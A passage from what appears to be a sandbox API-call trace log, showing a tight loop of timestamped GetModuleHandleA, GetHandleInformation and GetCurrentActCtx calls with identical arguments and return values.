hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.507] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.508] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.508] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.508] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.508] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.508] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.508] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.508] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.508] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.508] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.508] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.508] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.508] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.509] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.509] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.509] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.509] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.509] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.509] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.509] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.509] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.509] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.509] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.509] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.509] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.510] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.510] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.510] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.510] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.510] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.510] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.510] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.510] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.510] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.510] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.510] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.511] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.511] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.511] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.511] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.511] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.511] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.511] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.511] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.512] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.512] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.512] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.512] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.512] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.512] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.512] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.512] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.512] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.512] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.512] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.513] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.513] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.513] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.513] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.513] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.513] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.513] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.513] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.513] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.514] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.514] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.514] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.514] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.514] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.514] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.514] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.514] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.514] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.514] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.514] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.514] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.515] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.515] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.515] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.515] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.515] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.515] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.515] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.515] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.515] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.515] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.515] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.515] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.516] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.516] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.516] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.516] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.516] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.516] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.516] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.516] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.516] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.517] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.517] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.517] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.517] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.517] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.517] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.517] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.517] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.517] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.518] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.518] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.518] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.518] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.518] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.518] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.518] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.518] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.518] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.518] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.518] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.518] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.519] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.519] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.519] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.519] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.519] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.519] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.519] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.519] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.519] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.519] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.519] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.519] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.520] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.520] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.520] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.520] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.520] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.520] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.520] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.520] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.520] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.521] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.521] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.521] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.521] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.521] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.521] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.521] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.521] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.521] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.521] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.521] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.521] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.522] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.522] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.522] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.522] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.522] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.522] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.522] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.522] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.522] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.522] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.522] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.522] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.523] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.523] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.523] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.523] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.523] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.523] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.523] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.523] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.523] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.523] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.523] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.523] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.524] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.524] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.524] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.524] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.524] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.524] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.524] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.524] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.524] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.525] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.525] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.525] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.525] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.525] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.525] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.525] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.525] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.525] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.525] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.525] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.525] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.526] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.526] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.526] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.526] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.526] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.526] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.526] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.526] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.526] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.526] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.526] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.526] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.527] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.527] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.527] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.527] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.527] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.527] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.527] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.527] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.527] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.528] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.528] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.528] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.528] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.528] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.528] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.528] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.528] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.528] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.528] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.528] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.528] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.529] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.529] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.529] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.529] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.529] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.529] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.529] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.529] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.529] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.529] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.530] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.530] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.530] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.530] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.530] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.530] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.530] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.530] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.530] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.530] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.530] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.531] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.531] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.531] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.531] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.531] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.531] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.531] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.531] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.531] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.531] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.531] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.531] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.532] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.532] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.532] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.532] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.532] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.532] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.532] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.532] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.532] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.533] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.533] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.533] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.533] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.533] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.533] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.533] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.533] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.533] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.533] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.533] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.533] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.534] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.534] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.534] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.534] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.534] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.534] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.534] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.534] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.534] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.534] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.534] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.534] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.535] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.535] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.535] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.535] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.535] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.535] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.535] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.535] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.535] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.535] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.536] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.536] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.536] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.536] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | out: lpdwFlags=0x0) returned 0 [0019.536] GetCurrentActCtx (in: lphActCtx=0x0 | out: lphActCtx=0x0) returned 0 [0019.536] GetModuleHandleA (lpModuleName=0x0) returned 0x55820000 [0019.536] GetHandleInformation (in: hObject=0x55820000, lpdwFlags=0x0 | 